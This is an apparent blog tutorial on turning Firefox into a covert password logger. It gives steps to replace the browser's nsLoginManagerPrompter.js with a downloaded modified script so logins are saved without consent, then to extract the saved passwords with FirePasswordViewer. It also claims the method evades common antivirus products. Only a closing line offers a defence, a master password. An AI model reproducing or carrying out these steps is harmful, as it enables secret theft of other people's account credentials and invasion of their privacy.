How this Keylogger Works?
Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.
Can this be detected by antivirus?
I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.
Does It work on all websites?
It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.
Now I will give you the step by step tutorial on how to use this trick
- Download this script here http://hotfile.com/dl/110066569/8ceecf5/firefoxscript.rar.html
- Now go to the following address
If you are Windows user then goto
C:/Program Files/Mozilla Firefox/Components
If you are MAC user then goto
Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components
- Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
- Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
- So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.
The next step is to retrieve the username and passwords that have been stored in your firefox browser.
Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer
- Download FirePasswordViewer.This is freeware utility and is also available in portable version.
- After downloading run the portable version of the software.
- It will automatically find the path of your Firefox user profile.
- Now click on Start Recovery button.It will list all the stored website with username and password.
- The passwords are hidden.To unhide them Click on the Show Password button
- You can also store the results in HTML format by clicking on the button Save as HTML
ow if you want to protect yourself from such a hack I have a solution for you.To stop tools such as FirePasswordViewer accessing and decrypting your secret information you can set a master password in firefox.To set a master password goto Tools >> Options >> Security and now check the Master password checkbox.Enter your password and now your information is secure.